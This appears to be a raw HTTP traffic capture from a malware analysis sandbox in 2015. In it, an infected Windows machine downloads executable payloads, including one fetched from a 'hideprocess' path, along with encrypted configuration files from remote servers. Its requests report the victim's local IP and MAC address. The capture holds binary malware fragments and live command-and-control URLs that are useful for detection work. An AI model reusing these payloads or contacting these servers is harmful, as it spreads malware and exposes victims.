Host: prd-update.b0.upaiyun.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: marco/0.9
Date: Wed, 03 Jun 2015 02:47:20 GMT
Content-Type: application/octet-stream
Content-Length: 451789
Connection: keep-alive
X-Request-Id: 38052415f2f5c34fab65f2b0289cd2ce; 6b0210e182a42e6a5622ee22e84cacfa; 2c570de857ed50be654376b6abf88f3a; 84017f0f5a95c2a62480852635ed69da
X-Source: U/200
Last-Modified: Fri, 10 Oct 2014 08:08:52 GMT
Expires: Sun, 07 Jun 2015 01:09:06 GMT
Cache-Control: max-age=681976
Accept-Ranges: bytes
Age: 342272
X-Cache: MISS|HIT from ctn-zj-hgh-095; HIT|HIT from cun-tj-tsn-070; MISS|HIT from usn-us-sms-098
..MZ...................@....................!..L.!This minibox cannot be run in DOS mode....$Z..G......F...P..F...F...F......F...F. .F...F$".F...1.F.8.@.F]...1.F...1.F.....0.....@Richd..w.....PE..L......R............. ........R........0.&......@.....H....! ...Q...............4........P(...TS.R...LPl....!:.o..._0..0.J....text...6............. ..`.rdata..$..........R@..@.'.s.......T........@....rsrc....S....`......P....................O...u.3...A .......D$.P.....Y..................A j.P..p8A.,............T$..T$..p.........t....Q.P......P....<.....QV...N....PQ.D$...........t..F... ^Yk.....0...n0..._......t.P..T0A..F ...X0A..N(^.%l1A.]..%.....(.D$,.L$0.D$.3.PP.T$4R.L$.P.L$.QP.D$.(...f.D$$....& ..D$(.D$,.D:...4.D$8.D$<..P0A...(...GQ.T$.3.9L$...$....D$..D$..L$.;..L$..T$.u....P.S..U.l$.V.0W.y.U.h..@. .U .P.A..I.R.T$0V.... .P .QWSR...6A._^][Y.j.h..A.d.X...P...VW.(.A.3.P.D$.d........t$..D$(Ph.........3..N|.|$ ...:A...|1A....9....@3.....1.....p....... .`........!.................9....h..@.hp.@.j.h..........Q.D$4..E....T$.R..x8A..D$..L$..Ft.Nx...L$.d....aY_^.....Uj.h....'QV........{..v.P........$..p.......... ..9.........<.....>.2.N|.......D$................^.............Gj.h:...S........t$(3....\$....1A..|$$P.....1A..\$..\$,S{..S.@...1s...PS.....1A.P...T..AW.....0...O....0_^[...0...F.P...9A.......D$..t.V.......^g.... QV.. .........,..T$..F.....^]..p... ..V..t.....3..L$...t..I...3..T$,..... $P......(...(.......,.P.R.P.R.P...RPQ..Q.t.....F.^.(.3....v........@SU..3.9 ......9k ......W.|$T;.u=.C.P...8A...8..S..L$&
<<< skipped >>>
GET /hideprocess/2015-03-23_11_11_56_660/5a68951313d2d591998e790faf81a039.dat HTTP/1.1
Host: prd-update.b0.upaiyun.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: marco/0.9
Date: Wed, 03 Jun 2015 02:47:29 GMT
Content-Type: application/octet-stream
Content-Length: 131253
Connection: keep-alive
X-Request-Id: 5c0b395c52cb0988f35dd63948d4c9fc; bc97604dddda8a3ef0be77b0b847f417; 75fc99a2b730438414b753605f89a35d
X-Source: U/200
Last-Modified: Mon, 23 Mar 2015 03:11:59 GMT
Expires: Tue, 09 Jun 2015 11:56:15 GMT
Cache-Control: max-age=651107
Accept-Ranges: bytes
Age: 88755
X-Cache: HIT from ctn-zj-hgh-099; MISS(S)|HIT from cun-sd-tao-069; MISS|HIT from usn-us-sms-098
..MZ...................@.......-...........!..L.!This program cannot be run in DOS mode....$Z....J,..$...........$.?A....$........1........#.$......8..%...$..........8.....1.....@Richd..w.....PE..L....|.U......!.........P.....p=....... .......`...........2...M.....@5..8..1............b...T...d..BP...K.....`...#...!..8.....:`....O ...P.......text.................. ..`.rdata................R@..@.'.....|.......\....(....rsrc.... P.%.E....L.....P.areloc...P.`...1...(..B0.....*.......h......;....*..Y....uh........ hp..$.)&. h`.........9.......h........K.....&U.............3..E.h.................j.P.S....E.P.u.....P..x!.......... ...M.3........]........w..$......................Vh......j.V..~....oV4.....0..........t....t3.B......u.jxh.w..h.w...7...j7....&......3.^....F..B..F.....^[.....U..V..W...>y.Gt.jZJ. ..J...3._^]...u.j[....y.....0Sh.A...^.j.S..~..h.....C....V4.j P.s...~...M.... .........E.....0.....$....F.j&.. ...W.@.S....$..uM9%.Bt.ja..b.x...?.....8....r.jb...`..."..........3.[h....0..[..........W.}.jpj.......V.X}...G.....@.HtOHt6Ht.hX...h.|w.'....0.>...._.F`..FH......"....D...............SV...D$.].....W.\$........t.h...b.|...5..@....M...U.........;.t....;.t.h.4.c8}....4....K....w7...v....u-.......Y......s...... ...3......4.`...h.~...!-....Qh.~........R..P.......].P.......!..a...... ...3........4...;...h.~.....Q@...@.`......F.......x........................@............................tW...t.hN....!....q.............0S..g.R...h...... ..3..... .g6...*..<. h$3..,.."3.....(..^.!....1Ph,>...>. .._...
<<< skipped >>>
GET /txt/qpqpqp_201505291802.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=1FC77115C819B7258FC1528899CADE7A HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:28 GMT
Content-Type: text/plain
Content-Length: 131376
Last-Modified: Fri, 29 May 2015 10:02:33 GMT
Connection: close
ETag: "55683939-20130"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WtCdFRaA9XVxQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnJSg1HDvu0fCwtUwmory885X0B08Nr3lSxBaIDqW2l3RvsY GH2UJAHUCXzx4 mkGqSCDSlCWbCA IgmipfV8VJlwpOcrOixJhd4iH5KuvIsTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5ay0C63Xri3dBT5GlbXQrd n3YNPrA6SxfVvh3CJHt4bI9xlBmLsuLjPgwpxgTHibCn0Fz4eYFSdrlycn0DaQTrWJvgEYtUqAbYm ARi1SoBtCfJw2WASts57NldsOW7Tl sMaJudVXlW6wxom51VeVZRJhvIVRruRMTazQ2ZSPlrL8AYVCLiuZCCMVbBdE 4V8TazQ2ZSPlrxNrNDZlI Wvi03Nmtgxjj8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrbgZhvAzHEaPE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrTPMmJn/9ziEHRmRKbAnM6osYpk leK3vxNrNDZlI WtXEcfORTifCxn ZMaxjFZ72jWZM7wxJ5/Dkgp0v8b7UsTazQ2ZSPlrEkYhq4qBTrw/Rp3LuKWWWAvJ46JuW9FgLJZ8KCVZBu3E2s0NmUj5a3C2I9Jaq5QixNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrGwk/Dns/Y0/hTLesNOU3zfwD/apg uknevZ9E Uwawl3GIUk3N3uiy6tRS5Dm3Sir1KGo8YLxbG2cKNuElZSmmL5PfQjk3LmCUAzwPyKFymTuNpzKZ3D9LE13E7e3X22xoBkwrLDH iwt 0EC6c7IQTYRMkU0E7CDhDBtJFxElLm8XRdVeGS10qqLxRG/4nXI6Gb0tSXPVdrB8Cjc3Loba CrlOlo7Gz
<<< skipped >>>
GET /wb/adb/?Ab0D41yOowlXG854AY2UdElLsL5dm7fYae/MQ3O0WhoSzLAdfLxhwJInbX2UCwLX9zg2ns0ytLlKvANXi6vZsuSO7lqv9ZBePoDGa7XS FZhtut5BNw4nkVgQsKYOnKIclHKczDQt4CNpC5b/6amYRI44eLhwQ9vojjOVMdi2zkXOfAiQVwnUjdvdw7rKpi/ HTTP/1.1
Host: app.log.soomeng.com
Connection: keep-alive
Accept: */*
HTTP/1.1 200 OK
Server: nginx/1.2.0
Date: Wed, 03 Jun 2015 02:47:27 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: keep-alive
GIF89a.............!.......,...........L..;..
GET /main/2015-04-02_20_12_07_789/c8e92c77cf34b8aedc5df0f1d858db72.dat HTTP/1.1
Host: prd-update.b0.upaiyun.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: marco/0.9
Date: Wed, 03 Jun 2015 02:46:20 GMT
Content-Type: application/octet-stream
Content-Length: 648089
Connection: keep-alive
X-Request-Id: f410d7e60b27d4cece23e29d91736289; 9bc8c2544f2a3e1cbeb5bc3e10f08654
X-Source: U/200
Last-Modified: Thu, 02 Apr 2015 12:12:21 GMT
Expires: Wed, 10 Jun 2015 06:11:15 GMT
Cache-Control: max-age=657318
Accept-Ranges: bytes
Age: 247900
X-Cache: MISS|MISS from cache_img_86; MISS(S)|HIT from cun-sd-tao-073, MISS|MISS from usn-us-sms-098
..MZ...................@....................!..L.!This program cannot be run in DOS mode....$Z...N.../....Q.}n....1P.x...Q../...W"..(.........XT.. .1j.....&..1.Xo..@RichT..g.....PE..L....!.U.................@....hI..............a...... ....2.p E....!@.)..,..=..........Pd....C.@.....................8.....:.....O....P.......text...w............... ..`.rdata.....T.w.......&...."@.'....H........Z...........@....rsrc...."..t.%R.$.....P.areloc.............V(..B0.....2.U..j.h:bI.d.P..P...\.3.P.E.d...1.E......|._.P"J..E.....h..J..........M.d..(.eY..].....`..t`....`........lq.o..J..{q...p...p...xp......p..`p...p...h.._...h.J.h...V....Y..&h. ..p ... ... ..` ... ... ..P ..{ ..../............&.$....`./.....5h......0.*....%.. ... ... ...j.....J...._....h$P.j..J...0.&hD ... ..{ ..\ .. ..[ . h,...O...6...C....0i_...X..h@...-.. hJ...!..p..k_..j"..T.......hh._........$^.. .... hm.........B.....@.<._.........._......_.................0h..@.0..J............@...E..u..Z........$......\$H.D$H...z..z.....QU..V.u...tP...r...;.u..........s....t5..:.u'...t*.A.:B.u....t..A.:B.u....t..A.:B.t......^].3.^]...%.G..-QVB.S...u.6..../....E..t.V._.l...?.r^..]........Gj.h.`.._.%.M].G....L.....E.......%BH..3...R.V.E.VW......}.j..u...V......0.F.....F...E...F.......`.3..F.....f.F..E...F.f.F .E...F$.F(.E...F,.F0.E....u0.E..E...J.P.M.....K.p..E..#J......E.h..[.P.ID..WV.4R.....S..?.._^.M.3......J.....P...........{.!..m.......F,..t.P.....0.F,.....2.F$...k........2.F....P....6.B..F....5...>..Z.2.F........j.bE...F...#..........X..5U....S.....*U....
<<< skipped >>>
GET /txt/whitelist.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=25AEE42B466DB1826F98A5F21A9A9C94 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:33 GMT
Content-Type: text/plain
Content-Length: 3476
Last-Modified: Fri, 22 Nov 2013 08:41:51 GMT
Connection: close
ETag: "528f18cf-d94"
Accept-Ranges: bytes
/uOrJJOQ0bgY9jPW9p1UwzlabyskyS1ciztzZWKoyggyuwDxnQlnFOPszhAwXEvEP4Ro1Ye5GacBBM2ZDNbUU Fc3f8HO2qyXYpVEjVFoWD25ZqPJsCD8qOAB wgCXdRc0XuI/c7plLEOnja3WJ0VzSoUtOuytBo9YwHKaDQwFJ/phDpH1RmCT0PpVHeHte0bQ6FPVVO1cDEHLrc9hsubAeFdijjIAUPWLKAHfO1qSVWKjPB8v18PmI56rTDucF0jCYIsKUbX/gtuw1a 1n5bL6dhDiuNvG0kRhtox0AybwbErVMBK4XrK1obf LTAlyy77 sTZ3l0ESrpR2HHdxDEue6pcfMRhz0ZQahWmq8610CX29zZYVFy8H4hihJB2wjmGLCcv6NV ggd gsC/STce7Pnc19RuUC8HVCyN90N9Y87b4rbC PHFnT9tYDoFGmyyJgRwnmH04MROJDdJzbnxsJeuN tjovl57mS39 UIxrLwWibnt/RUpHPDIFivoP1rZPgoyGyE95m/oQtasAP8QFwrqal0MMZjhYDvG0wCByOT9AZLpjIdm4QwX2q1Z1EwLsRa/RJB4wvPvo42hN5l9kVaqbU rcG/IZZBR CayLrkJrly/6psVd4mRXOidYZdVeLWvHQjqVz0y6m VA2VnWwIEb3UeVG4pHbf1sFsTIRUyA8yri1qFQdgILxA C5RvEeLlw i9JjXOrCss4pbS7Gn3dTZPy7kD7aptBNwBZ8AXyqK1lu iWTl/ WkoR9Sj3yWf5MVOHoX0VXWWxQot2/8PHlSQzDVv 2De/01k1xpsCsqniIqyltVIso5nGBEpRygNWYEN9vdk1sZugGX007PYU1RmkDJowgiCqQE3Z S8bBaOD46ikCWqMp0G9E1AeswK2Fz55zwjKvkukxSlQ 11kwxCgKRMANZGEOBE5zuEAYr1tXJIAKEkCyHgSEhnCcSms7bXzTZ K xavSklFGxxJoPGgbM9ntFXfCfCSVEg/75DV2dtPnAVPulvRG6ad9b/psmHQ87Ydux5R4nebyiCGAe8dJXk ozRC7esRpe37G1KTy67ti3mGCfv3XaFfzEDCXAQJDXzydYGwzFbufHoC6Oba8MBykz0IRvTgoHtzTpc3irGlZlpVdPKLzftyFBXGFSCa8DGCYXvpqdbfgQF2RpFckUmT01I13SJamGR957aQ7zoWd2xRg0TSaLDSO1iVXspPs40FHsQj/U4VK wzXHEoiyLu19qAK1imxhLpQKlr3uOju wkOjTY2vzdHLI3adsBo8YTrxVZb9db1HdkTNRFco46wqEOgw2Ieq jeNXWMXndNju7gbC3N7/5twJIkqZFt6MP8 y28KrDOB/DYFOHqYtthS4UvBZQwGyAukrufTRbs3BENArT3eDtQ2sAZJu2SAkVick9vQughZJetuuHbPMUbUJifqAy131nC6fgdmPhUNapajXDdjBC1GNg7iHk7hQ/w3CkcoEtqSGlGA49EyNV7bwAGoVc7x/Xb8eCvC/nt4eeGsW
<<< skipped >>>
GET /txt/popup_20150414.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=545EB4FE6391624B14A14B0DA1B44223 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 404 Not Found
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:18 GMT
Content-Type: text/html
Content-Length: 747
Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">..<html>..<head><title>404 Not Found</title></head>..<body bgcolor="white">..<h1>404 Not Found</h1>..<p>The requested URL was not found on this server. Sorry for the inconvenience.<br/>..Please report this message and include the following information to us.<br/>..Thank you very much!</p>..<table>..<tr>..<td>URL:</td>..<td>hXXp://ln.p2ptool.com/txt/popup_20150414.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=545EB4FE6391624B14A14B0DA1B44223</td>..</tr>..<tr>..<td>Server:</td>..<td>localhost.localdomain</td>..</tr>..<tr>..<td>Date:</td>..<td>2015/06/03 10:46:18</td>..</tr>..</table>..<hr/>Powered by Tengine/2.0.2</body>..</html>....
GET /txt/First_20150519.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=460C53B3BCD3A1C782689F34C2BA4209 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:18 GMT
Content-Type: text/plain
Content-Length: 185696
Last-Modified: Tue, 19 May 2015 04:05:51 GMT
Connection: close
ETag: "555ab69f-2d560"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI Wu wwnN9cEhzQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnJrPpIprWhJ2tPlAWn5 TjuztACdIRySqDk4MSimnTp7Za1Le92vuezrOyB4j/JVkCCgW5ce60uh313VwRVQB2SErOAjo8XcQ2WTk w36cDu4SJAaYIwk4/xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr5flXLXC5JH32nMDkPr o8n05oDilNe9ohcLeJfUZLUAxjJhcXsCVRzZRGqugj1TL1tXZUFbwHFHnTppb1vpUZub8fxolpGyp5vx/GiWkbKmJMRiA8G3nBa2Pi04AYpQX6wxom51VeVbrDGibnVV5VlEmG8hVGu5ExNrNDZlI WvHDXnxMFqqR8/kuGsSG23HxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrgxx16VQkub/E2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvoEO8sXymTr9VHGe2k 9RJcWz6ytVaQ5/E2s0NmUj5azE4dSQE6hF3aV6mEpZjZPX2q/qmcTWzkmR2fA/LXFaCxNrNDZlI WvqkpwmtYwEg/WqE7QcsrWWi8kaOaFmzJl6VALS5kB2H8TazQ2ZSPlrcLYj0lqrlCI/Rp3LuKWWWBrfwq59iIOLC0tZfezaJwrE2s0NmUj5a qSnCa1jASDxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
<<< skipped >>>
GET /txt/urlnav_141114.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=965923D00313F3B495AA8CE533ED63C9 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:18 GMT
Content-Type: text/plain
Content-Length: 111288
Last-Modified: Fri, 14 Nov 2014 03:29:19 GMT
Connection: close
ETag: "5465770f-1b2b8"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI Wu7vg7o4OGLvAksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnJX2G2Yw6VqVQ6FniCe06ZDVEnGhKZIy9GgiH6/wrMOvilrWtIoUgA8dl63vkFlYsv808n9xoPjKOkA0d9/AUDVLIWyJKGfQ30oQdaSw ooRKP3TITS70qtG23VOoAzU/dEk APRjAGee1kHoMkGXR442O5E7FXkFrE2s0NmUj5ay0C63Xri3dB7txKLcg4QGva912G4GnwNO6uG0yW9iLynDUHq/HLA1I0Mgx7sTvMrqVegigsaPAMlycn0DaQTrXm/H8aJaRsqeb8fxolpGypFklHa0IUJrWtj4tOAGKUF sMaJudVXlW6wxom51VeVZRJhvIVRruRFx5KEBxs2/8UZSS65y3h1b0AuZLZP47s8TazQ2ZSPlrxNrNDZlI Wukxah1b3uqqMTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrTPMmJn/9ziG LTy9adcaKIsYpk leK3vxNrNDZlI WtXEcfORTifCxn ZMaxjFZ7AA7l/dPFp2Oo4QVxT3CU2MTazQ2ZSPlrEkYhq4qBTrw/Rp3LuKWWWBNKEt5jwcC0SLZsRYA4Cs/E2s0NmUj5a3C2I9Jaq5QixNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrGwk/Dns/Y08qL4WDoLD oURZpHHpqzKdokEsJbVR23tr2s6uv3 o5ZREMMJf0vpcLusis07 NvMwA6jAbzQgABzIbqI92FStaOaeCfpWjRWrVGp Dwvn3pFK8vui2f77PmI XJuiyzi0Zkkx56pL9K75Mk7A9r648UKKHO63ouLGnQi8l0bpnC5T0Yty5kQ41Wy3 HVsBv5Bepmeh2dZe/TnDXSN51O5
<<< skipped >>>
GET /plus/config/zynet.4.bin?ver=3.180&lip=192.168.25.207&mac=000C298E22D8 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: plus.zzinfor.cn
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.3
Date: Wed, 03 Jun 2015 02:46:14 GMT
Content-Type: application/octet-stream
Content-Length: 1351
Connection: close
Expires: Wed, 03 Jun 2015 02:46:14 GMT
Cache-Control: max-age=0
....<........09......7.!......,........................ ..............................................Q...*#..-*g...C..[I9l)e...LW.JPT\.R.).CICmff:aXR.E\.....Dwr&9;.8j=>w*#M...EMVS.Btb`R7o...`...T^..c.bK..K...B#..................-........................................................................^........Y#.........3.c.....KSSF.&y..'.S<.XJ\,....................................................h..........8G..@............'Xzh2z(g/77*,<v?`Rm4............................................................j.......F....b9\j..Z.4..........................5.............................................................h....>..d#....L ...............................4............................................................l...\T..|.#.....Jv....M.....8h.V.TDg,ltiG..Z.V.Mc0hG3...........................................................i...0.....q....%..R....z..........................2..........................................................r.....!.C..J?.....n.M.i............................ ...................................................[A.x75d.vj}de?JX...`...F.S......h.4..B...............-.....................................................]...`U..)..oe..=..p...u................,.........................................................].......%.. Fm..o...........~-:hyF\P.6~49`1^.34q(..................................................
<<< skipped >>>
GET /txt/ndis500_201506021708.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=7CB8231FE216E8F14A76B6A891124D85 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:23 GMT
Content-Type: text/plain
Content-Length: 349276
Last-Modified: Tue, 02 Jun 2015 09:08:27 GMT
Connection: close
ETag: "556d728b-5545c"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WtCdFRaA9XVxQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnJSg1HDvu0fCwtUwmory885X0B08Nr3lSxBaIDqW2l3RvsY GH2UJAHUCXzx4 mkGqSCDSlCWbCA IgmipfV8VJlwpOcrOixJhd4iH5KuvIsTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5ay0C63Xri3dBT5GlbXQrd n3YNPrA6SxfVvh3CJHt4bI9xlBmLsuLjPgwpxgTHibCn0Fz4eYFSdrlycn0DaQTrWJvgEYtUqAbYm ARi1SoBtCfJw2WASts57NldsOW7Tl sMaJudVXlW6wxom51VeVZRJhvIVRruRMTazQ2ZSPlrL8AYVCLiuZCCMVbBdE 4V8TazQ2ZSPlrxNrNDZlI Wvi03Nmtgxjj8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrbgZhvAzHEaPE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrTPMmJn/9ziEHRmRKbAnM6osYpk leK3vxNrNDZlI WtXEcfORTifCxn ZMaxjFZ72jWZM7wxJ5/Dkgp0v8b7UsTazQ2ZSPlrEkYhq4qBTrw/Rp3LuKWWWAvJ46JuW9FgLJZ8KCVZBu3E2s0NmUj5a3C2I9Jaq5QixNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrGwk/Dns/Y0/hTLesNOU3zfwD/apg uknevZ9E Uwawl3GIUk3N3uiy6tRS5Dm3Sir1KGo8YLxbG2cKNuElZSmmL5PfQjk3LmCUAzwPyKFymTuNpzKZ3D9LE13E7e3X22xoBkwrLDH iwt 0EC6c7IQTYRMkU0E7CDhDBtJFxElLm8XRdVeGS10qqLxRG/4nXI6Gb0tSXPVdrB8Cjc3Loba CrlOlo7Gz
<<< skipped >>>
GET /txt/listbc_20150602170806.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=E80C963847ACDC40BDEC9EB688A407E8 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:18 GMT
Content-Type: text/plain
